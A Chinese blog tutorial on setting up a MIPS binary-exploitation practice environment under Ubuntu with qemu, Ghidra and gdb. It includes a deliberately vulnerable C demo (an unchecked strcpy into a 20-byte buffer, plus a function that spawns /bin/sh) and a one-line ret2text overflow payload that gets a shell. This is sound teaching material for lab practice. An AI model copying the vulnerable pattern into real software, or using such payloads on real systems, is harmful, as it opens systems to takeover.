mips pwn 在ubuntu 里面的搭建

最新推荐文章于 2024-06-06 11:32:12 发布
最新推荐文章于 2024-06-06 11:32:12 发布
阅读量908 收藏 3
点赞数 1
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/98343160
版权

最近看了一些mips 的文章 感觉手很痒,,,   路由器的指令框架基本是mips的

然后 我这里来搭建一下 mips

第一呢 就是下载mips的gcc 的版本

这个 其实很好整了   百度一搜一大把 

然后 需要静态链接

mips-linux-gnu-gcc -g  ret2text.c -o ret2text -static   

然后就可以 直接运行程序

(前提是 安装qemu)

然后 程序是 我根据安全客 的一个师傅写的demo 看的

反编译  工具的话  我不太推荐那个 ida 插件 (我装了 一天都没有装上  )推荐 jeb-mips  或者是  ghidra(这个工具我是真香了)

然后我在这里直接粘贴出源码

#include <stdio.h>

void vuln(){
        system("/bin/sh");
}

void has_stack(char *src){
        char dst[20] = {0};
        strcpy(dst,src);
        printf("copy success!n");
}

void main(int argc,char *argv[]){
        has_stack(argv[1]);
}

然后  ghidra 工具的 反汇编效果

 

 

感觉确实很好用 基本都分析出来了

然后 gdb 调试的话 我用的是 DVRF 这个靶场带的 gdb 感觉 还可以

然后 是远程调试

 

这里发现了 返回地址 那么只需要覆盖一下就可以了

 

 

发现这里并没有成功 因为我们这里是大端  然后前面那个  00400850 的00 截断了  所以 我们要化成小端 的  一开始小端的一直不行 这里我 用了   buildroot的  qemu-mips   ./ret2text `python -c "print 'a'*28+'\x00\x40\x08\x48'"`

小端的话 直接可以拿到shell了

ok 完结 撒花~

参考链接

https://www.anquanke.com/post/id/84580

https://www.anquanke.com/post/id/171918

https://www.cnblogs.com/WangAoBo/p/debug-arm-mips-on-linux.html

pipixia233333
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn环境搭建_mips-pwn环境搭建
weixin_39634876的博客
12-19 624
mips-pwn环境搭建在比赛中偶尔也会遇到mips架构的pwn题,要做这些题,首先得把环境搭起来。本篇介绍的是mips架构的pwn环境搭建,主要是要实现两个目标:运行起来mips架构的程序方便的对mips程序进行调试安装qemu及相关软件mips程序是不能直接在我们的电脑上运行的(架构不一样),为了让mips的程序跑起来,我们得使用qemu模拟器,qemu除了能模拟mips运行环境外,还能模拟其...
Ubuntu上使用QEMU模拟Ubuntu
千重浪Linux技术工作室
09-08 1441
Install qemu on Ubuntu (1) sudo apt-get install kvm qemu libvirt-bin virtinst virt-manager virt-viepwer qemu,kqemu,kvm,qemu-kvm,libvirt关系 http://www.cloud2012.net/post/23.html QEMU的三种运行模式 http://book
PWN_环境搭建
qq_42192672的博客
12-26 1275
最近需要重新搭建一个PWN的环境来应对接下来的任务,就顺便记录一下,以防将来需要搭建的情况 虚拟环境搭建 这里还是用乌班图16,我选的是中科大的镜像:http://mirrors.ustc.edu.cn/ubuntu-releases/16.04/ 然后就去VMWARE里去安装 安装完后有一个很大的困扰:Linux鼠标选定自动弹出 ^C,例如在Terminal里 用 xshell 时莫名奇妙发现...
Ubuntu22.04虚拟机安装MIPS交叉编译环境踩坑记录
最新发布
qq_38966051的博客
06-06 348
MIPS汇编编译环境安装
2022CTF培训(九)MIPS PWN环境搭建&MIPS PWN入门
sky123博客
12-22 1870
mips pwn
mips&arm&aarch64-pwn初探
seaaseesa的博客
04-02 4808
mips&arm&aarch64-pwn初探 前言 厌倦了x86/x64 平台下的二进制漏洞利用,来看看mips/arm平台下的pwn是如何达到利用的。众所周知,mips/arm架构cpu主要用于嵌入式设备,比如路由器这些。当我们在x86/x64平台练习到一定境界后,再去探索一个新的平台下的漏洞利用,我们可以借鉴以前的方法,总之,思想都是一样的。只不过是指令的样子不同而已。 ...
PWN环境如何搭建
ro4lsc的博客
03-28 8201
本文主要写了做pwn题的环境搭建,希望对您有所帮助
ubuntu20.04 PWN(含x86、ARM、MIPS)环境搭建
热门推荐
hollk’s blog
06-25 3万+
最近在ubuntu20.04中重装了一遍PWN的环境,顺带着安装了ARM和MIPS的交叉编译及运行环境。装的时候也是摸着石头过河,好在拍了很多快照,即使装错了也没有关系,下面是已装的工具列表:
Ubuntu16.04 MIPS嵌入式编译环境搭建
weixin_42683366的博客
06-16 681
尝试Buildroot编译(失败) Buildroot用途:可用来编译对应CPU架构的编译环境(toolchain),系统镜像,bootloader。 优点:buildroot提供类似编译内核时的menuconfig图形配置界面。 坑1:在最后make时 会自动到网上下载相关依赖文件到dl目录下,网速很慢。 坑2:编译时各种报错,本人菜鸟一枚,经过2天的奋斗果断弃坑,不过还是学到了挺多makefile的相关知识。 //具体buildroot编译目标toolchain流程网上相关教程很多。 尝试apt阿里源下
Ubuntu运行MIPS程序
还是上会网吧~
04-14 1689
QEMU的下载和安装(Linux平台) apt-get install qemu QEMU的基本使用方法(MIPS) qemu-mips -g 666 mipsfile    等待gdb调试,在IDA中选择remote gdb
ubuntumips 运行调试环境搭建
BadRer的博客
03-03 2200
前言 又要开始搞毕设了,随便记录一下。 ubuntumips 运行调试环境搭建 参考链接: https://reverseengineering.stackexchange.com/questions/8829/cross-debugging-for-arm-mips-elf-with-qemu-toolchain https://veritas501.space/2018/07/26/qem...
UbuntuMIPS编译环境的建立及编程
Pierre
04-22 6514
UbuntuMIPS编程环境搭建,参考了雷思磊的《自己动手写CPU》,记录下根据书中所写一步步的实现过程 1.首先安装VMware和Ubuntu虚拟机,然后到Ubuntu官网上下载ISO,之后在VMware向导下自动配置,先把Ubuntu点亮再说注意内存的分配,以前好像有朋友遇到过内存分配太大而无法点亮的,一般1G即可,大概半个小时的安装时间,吃完午饭回来就安装好了,换了个有情怀的桌面,感觉好棒!
栈溢出(PWN)学习笔记
Haowill的博客
12-14 6035
栈溢出(PWN)学习笔记 一、栈简介 数据结构中的栈 数据结构中的栈就是在表尾进行插入和删除操作的线性表。可以进行插入(push)和删除(pop)的一端称做为栈顶,栈底是固定不变的一端,空栈是什么数据都没有的栈。栈是一种后进先出的数据结构,先放入的数据最后取出,最后放入栈的数据,最先取出。 数据结构中的栈定义了一些操作。最重要的是PUSH和POP。PUSH操作是在栈顶部压入一个数据,并将栈顶的值加一。POP操作在栈顶部弹出一个数据,栈内删掉一个数据,并将栈顶的值减一。 linux内存布局 Kerne
[羊城杯 2020]Bytecode [UTCTF2020]babymips
寻梦&之璐
05-30 1146
文章目录查看题目python代码Z3约束脚本 查看题目 python字节码,需要把它转为python代码,如下: python代码 import dis def main(): en=[3,37,72,9,6,132] output=[101,96,23,68,112,42,107,62,96,53,176,179,98,53,67,29,41,120,60,106,51,101,178,189,101,48] print("welcome to GWHT2020") f
pwn基础知识笔记
月阴荒的博客
02-20 2341
算是总的开一篇文章,把学到的知识总结一下,之后会重复写到各个文章里面 checksec指令, 用来查询pwn题目的壳和保护,并且能够看到程序的信息 1.Canary保护 参考链接:https://blog.csdn.net/weixin_44540286/article/details/101629735?utm_source=distribute.pc_relevant.none-task Ca...
MIPS汇编指令
sunshine
07-10 6073
MIPS指令特点: 1、所有指令都是32位编码; 2、有些指令有26位供目标地址编码;有些则只有16位。因此要想加载任何一个32位值,就得用两个加载指令。16位的目标地址意味着,指令的跳转或子函数的位置必须在64K以内(上下32K); 3、所有的动作原理上要求必须在1个时钟周期内完成,一个动作一个阶段; 4、有32个通用寄存器,每个寄存器32位(对32位机)或64位(对64位机); 5、
pwn真的入门了
萍水间人的小天地
05-01 868
终于沉下心来好好的把ctf-wiki上的pwn部分看了一下(当然菜鸡的我海之看懂了栈) 首先需要补充一下aslr 我们可以通过修改 /proc/sys/kernel/randomize_va_space 来控制 ASLR 启动与否,具体的选项有 0,关闭 ASLR,没有随机化。栈、堆、.so 的基地址每次都相同。 1,普通的 ASLR。栈基地址、mmap 基地址、.so 加载基地...
D-Link系列路由器漏洞挖掘入门
12-17 472
D-Link系列路由器漏洞挖掘入门 前言 前几天去上海参加了geekpwn,看着大神们一个个破解成功各种硬件,我只能在下面喊 6666,特别羡慕那些大神们。所以回来就决定好好研究一下路由器,争取跟上大神们的步伐。看网上公开的D-Link系列的漏洞也不少,那就从D-Link路由器漏洞开始学习。 准备工作 既然要挖路由器漏洞,首先要搞到路由器的固件。 D-Link路由器固件下载地址:...
mips linux 编译器,Ubuntu上构建MIPS 交叉编译环境
weixin_42515101的博客
05-03 374
为了写点程序在 DD-WRT (broadcom) 上跑,尝试了几种方案建立交叉编译环境,最后还是以最简单的方式满足了自己的需求。1. 在 cygwin 里面搞交叉编译环境是很麻烦的,要下载源码自己编译,而且由于移植到 Windows 平台上,往往会出现一些奇怪的小问题,不推荐。2. 我曾经打算直接在路由器上交叉编译,不是不可以,麻烦,速度极慢,不推荐。4. 安装 MIPS 模拟器sudo apt...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值